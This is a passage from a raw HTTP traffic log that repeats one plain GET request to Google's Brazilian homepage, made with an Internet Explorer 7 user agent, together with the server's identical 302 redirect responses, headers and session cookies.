234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2euCHUgn7udFsbguFETQoCdW0p-UBhEqsQcKE6CGQrFMPuum3WMCQ; expires=Tue\n 05-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=iiHfTppBI4kI9uB8bJAKhqCl6-a_cGFhOBeiI-XY5ZCxqrotJCcvKzzV7sp0Uc-UbmIpmsHQmwE0X3ceJkNKHqSj8vj2SqXgplBYIJsUMtJaiulCuZs_KPAkU83hOJMBwvfTnI2hfXfXBcj5dDxpOH65S4iHcPxCYAuQkTYzIhMVrlFvIit9JGhTFVBqy9T99xGbHyZPVmmFods; expires=Fri\n 08-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-atXymvFS0LsYY5iwAk-ZJA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:58 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2c8HSnQa3JJQ_MZXO89G-30c8cUSw08Gz_mJbIPH-eDadVIUYXJnQ; expires=Tue\n 05-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=lPur-hVjVYGbqrKnRuXqgPYUcqTQxBogUVUDJ4d9G018Q3V3MQ0tYwWwoq9dxPZJSG7G7rNjgyQRy17yQl-FFYCmHGAgiMfuhCMy9AonEqjiTj-MMA7tAN9n6-w4eDSdabmZK--HD_7LGB-LEzfBSjd1ePBHGJBMqjE7OJT-sKqAib4xzibRpXeCz5MhDih609rwgCk6Ndo9QTs; expires=Fri\n 08-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-YQEB4aucBJK6yyXuhMztHg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:58 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2deaEb-haGIteTk1JYCSS7fgIhqQXHFwYPTWt5dAa9C3x60U-tH_g; expires=Tue\n 05-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=xgJojeGw9cBVs11-ckNsHdI9zAjqzbSEvOpKDUqLpql4NfzpLnGiAZMmossdKrYC-NqPq8Q7QpJP8byt_uW3vg1SWd3bGh4hQMupii8lnmyvTPJdl-C8cwgv6PlYz6_QmCaBDv1WSHlLvLhENLW4sdOuoLUQzqnb8owFaV7-ax9byfmad5NIDQRmmoED4Z8Z_Q7D3hSmfQTxDw; expires=Fri\n 08-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-NXL6IVki4l3qrDpqWA0eYA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:59 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2duEvX39YrFZ93m4y7N9XDCKGTgzE3dAo8SXBtnWJ5bzTfkb6uV-w; expires=Tue\n 05-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=SvH4pehvwlXdso3oVQT6ZF9grRvNdOf0_9222Pn-kYg0h5c866yUe6neo2c3hDBPnEs2Xu5EEFzynFIM_r1TpaVDix8NT1imtoTdJfnYh5IDvFT7A4-YqZzM1vX47fdy0wqAwGIYdn8RFd1_0yhaAOSGPPrlw7JAeqtUDYX2nEkfFA7ceNUtXYaAZjWWCo3Ei9_VqyDwUEa5dw; expires=Fri\n 08-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-HDAgVGaj7vr9mE4x5GZe5Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:59 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cQoFpHN8jzEWUGKEQOkwpLEsIs7wS37-Pzeh3QtvqJzvYIrm4B46Y; expires=Tue\n 05-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=Jdjlu3tUJIVB7R5ZDKwlgewkUpcjXk_B_bs_99iU75nR91s8vxzY-9rn5DNtLWTqCGNRB393IPPoJ_EfRzAqh7C_EZepd81-FkVSdozEfv3C0M9bBN-b2ScaNo581PMo4ffRiu-3XtlMVC7rYBOq2KfhHn6S6FgYGBWDQ18H7-x0mgjQHiptSfERtAUfAYKb_D0Kxnco6m1ihA; expires=Fri\n 08-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-kJc7emmrbx33ca6t7DZ5OA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:00 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cbX9UpkaEGhPVKZQ-8cg5dLE-uCuGIbOygf72impG7fo7iEQvPuYg; expires=Tue\n 05-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=uTKsNLwxd5DrzdCRY5lIcnOPiLgS7php0Qvx8PlsokGy1p_UVlkH1kZe9TFGFHYvEKEUqi4oaioDL97SevZKuz0XboeIwUOV5t8z0KanSjX-m87CtKmjhMetJ6_bDTSyYRDAAS-8_Sv2cdt3Dsvdqv9gqf6sBM6N1463iNbu_fs8KPQdN02UGayF8C31gA5Atdn4rqF_1pz5OHQ; expires=Fri\n 08-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-1KhJLaqnWcwdHesBscsUow' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:00 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e2NXtcgAb-e9qjfH5p1LeFYkLqHU9fiO-uxMOaUSZSZnlJ_0QIag; expires=Tue\n 05-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=nB3UZ2oK6esfXowgBrXhZIZBMurDt9lxi7EIFa0uXjbwbiKxIb6A4ChZJx0_VlM2f8c0TnxAVWt9CzucuTXovwTUkVmOB0HgqvbanVMdeMtIbStKVqWrh98KBbBFoPmS03frDvpI7tjOpENPXhnfmI4cVhLtFZWPf2M-aS0Yr55QAnGNQFjHwZz6HJytvWFNJ2clZ4bJQjutzQ; expires=Fri\n 08-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-mluK8ppciPbPhU8NthEG3g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:01 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dGErXO2zDmflirunfdMsw5Tgy5oLnypKYvESQgJDZS4qBV_lBn3Q; expires=Tue\n 05-Aug-2025 09:13:01 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=gQz7lo0kNaJxbrfgG_U_MVWa5a7U0mC4O0SCwABrRN27s_U4hnG2dK8tF6xxYtrOXQFDGwLCYPG3pws95JCXR611YoqrBsNTQdmfM47wY6H3InXOljypdFmnEXxtXYMVt7vfGUtOQrXyu3U6rXgQwlvfUfWK_r5VbDKX-xAHqNyuXVirrxpvOgZ3_y8WkQk2e3EvpaQ8BZ9LNac; expires=Fri\n 08-Aug-2025 09:13:01 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-HrdFXlmxTZ8uAxdD20h9rg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:01 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cH3W0tpVklgamWqIsaj1wNQ-gQdz2BjVWtssK_i7YRDJN_Z9857Q; expires=Tue\n 05-Aug-2025 09:13:01 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=ksFW4HXgq1lycgReocs7t4UGRvN5cRjojungN70GxDPANmCIWnufw5SrX-x-TqK2J7XA8nmvHxzOvxESm2pwaWq4iDZxo9RpRALj11JHgfnKnc2cMTFVhnVQO2zgu6s2L-ad6GMwpWWVO5jcXMPKlcHAc8To4Q8qrZzZYkNVrI7uxyjNx-XIQMyrw8dfM7cQ46gE9zq2FKVOll0; expires=Fri\n 08-Aug-2025 09:13:01 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-LSXKmOc-Gk9MdC9vUdqFrg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:02 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cUDU1f1TAZNOe49dayAT5qUxIircxGubYOOQgQ9QpiKkPwxwf3Xt4; expires=Tue\n 05-Aug-2025 09:13:02 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=IzlF-bVCWcoZSdfo8LkgVrUcWsT6ChR6BQ3RwLnpAUlQqD9zKkl9YESzZYlBbvARWCCF8T6Vv3GBgmJkKP7a0D-ezXAynMqKufAmo_lq8GcvvffoHPJxAzB7oX_PL6iLYztvuqZb16Q_rbvACwHBMa1h92oOgAN6PD14kuvvyUGoSe9__19Whr_5bAUzfbttolKDYNYnOCsR4VU; expires=Fri\n 08-Aug-2025 09:13:02 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-qpBe6TqTRuwKGXWZCuls5A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:02 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dE1lhBWPH8iNx0qz9zNI-CsKRFcBkmr1QjPXC0piqsvutUH4a8yKQ; expires=Tue\n 05-Aug-2025 09:13:02 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=tAaVSDnezTGdUNqoOmCySvUl1-o9fIMTGt9b6mvrEey6OwWz0Bn-jqVzJNGgL9lkrEg_QYzIRyLLstYO5MEciYFD3Ujadzx2TXSY6eVUHBuvo2rW9WlmYsabmP0ecXOmZWXe-TANYXD-5ZfaCm4EkIPzrrqxKl6F5VAbrUhJInwwAq2GGWGzz04JZA0HflGEIdBFI8_g_jqK8Q; expires=Fri\n 08-Aug-2025 09:13:02 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Mr8M5AfVzlcJ6xqQxEi9bg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:02 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2djDJRiSFv74iB-iRtvHXqX2S0_NvYagEi4YW9IKLE-rzwqsOVDFdQ; expires=Tue\n 05-Aug-2025 09:13:02 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=T0nnPpwMSZ5bKCJuX5W__LtSZAZ9eYqnhuN0sLtMC96epqAY-cLyAUPAU5_wbqczV8B0ITG2E_TcANCS6PefzIfJSrrSp3499Pq9oXCqFeD9SKt-rmp6pwo4AE-8id4brJFNJykn2GQj5CS49fzM2APyc3pLxvfmpZOrO25GVCiFD27dNHRN1aCITc67TlDAVSliwHoIEklwcWQ; expires=Fri\n 08-Aug-2025 09:13:02 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-z_j5d3isN1MwvtSLz74jXA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:03 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eGQEfcd6rAANuIXW8ck3KhJQ-NJQU6lr7kRLN-fxnsUcREX_a0j-k; expires=Tue\n 05-Aug-2025 09:13:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=nUUXqkTvegf7eiyyvZBgoZr_wz9PjqV0W67pm0oonTUIxA2rvIgok44dfWm_gIKssV8LJ9HMIj57R1uQfyTyyFkBJpCPPKLYRNvz9WAxK4SS9yJk-6XhjUecsBP1So9b9Q7f4d1W8sA_Uvowz5e82PPvLleZYK78QoqCv958EV0eEbsqVx4YTB3pXV8wBG7xGeSRYFQ-JMENaNY; expires=Fri\n 08-Aug-2025 09:13:03 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Xm7lpb_2xkPK_8vtupVkkA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:03 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cFAEU5PmMn4XWnmJ974R-ThagGZBLz-YFXWZYAC-gNgrtZSiA-Dg; expires=Tue\n 05-Aug-2025 09:13:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=dEWAB9R4_M1Zh0v2q_d-IH74BcpdmpPcQT9qFheYF9da04sVrgH6SQgkH32ZAZfMUuaAdgTF5VZ-0hGKV_JsTLWBrTYCoOy75R4RMhuT4cYhPP8j_WoCglGHjvFwemN9ZkBT7X0eSF_ldRcUyYgeQdKTQC_gVuCpF0fFOBZb0Wfkqr7hw8H9LpPqZ2WRmiAjuO2qmvDdqlYAq8E; expires=Fri\n 08-Aug-2025 09:13:03 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Fs0q4nvn5aboNZUI_8Po1w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:04 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2c8RtEX4IwlnT0VmIwYOazo36CtZNbbj_a5d67KrjhR_hx-aaHOlq4; expires=Tue\n 05-Aug-2025 09:13:04 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=B5g-v7zK6H49sMqxKYQfyR1kQiJX5FSv0TciRZUrtvuxrK8JCxCQLQxMTZSN1PO0-Jp_7fw0m9dY_20Pkf0zg_daAc52KjAtAelfLuqIB6JZBpMVNE9cgDC60WPBv3Wgh_X6GvVt_Q0SBfgqXsEf8cGzWY1FbJATl8T1zgb3l-Cuiqsx8Dj0nRgP12BI8ao47xH3JJRMCWPT74M; expires=Fri\n 08-Aug-2025 09:13:04 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: 